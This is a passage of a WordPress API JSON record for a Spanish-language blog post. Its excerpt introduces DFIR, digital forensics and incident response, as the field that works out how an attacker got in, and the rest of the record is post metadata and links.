desde su habitaci\u00f3n en el z\u00f3tano de la casa de sus padres&#8230; Y te habr\u00e1s preguntado&#8230; Es as\u00ed?, no lo pueden detectar?. <\/p>\n<p>Bueno, esa no es la pregunta dificil. La pregunta dificil viene despu\u00e9s que sab\u00e9s que lo detectaron y que te hacke\u00f3: <\/p>\n<p>C\u00f3mo lo hizo?.<br \/>\nPara responder esta y otras preguntas relacionadas existe DFIR, la rama de la ciberseguridad que se encarga del An\u00e1lisis Forense!<\/p>\n","protected":false},"author":1,"featured_media":1981,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1427,1241,1223,161,1,17,804],"tags":[1446,823,1441,1442,1445,282,862,1443,1444,37,242,1221,263,818],"class_list":["post-1976","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ciberseguridad","category-hardening","category-redes","category-seguridad","category-sin-categoria","category-tecnologia","category-ti","tag-ciscontrols","tag-debian","tag-dfir","tag-forense","tag-gns3","tag-hack","tag-hacking","tag-incidentes","tag-incidents","tag-linux","tag-network","tag-nist","tag-security","tag-server"],"_links":{"self":[{"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/posts\/1976","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/comments?post=1976"}],"version-history":[{"count":14,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/posts\/1976\/revisions"}],"predecessor-version":[{"id":2001,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/posts\/1976\/revisions\/2001"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/media\/1981"}],"wp:attachment":[{"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/media?parent=1976"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/categories?post=1976"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/tags?post=1976"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}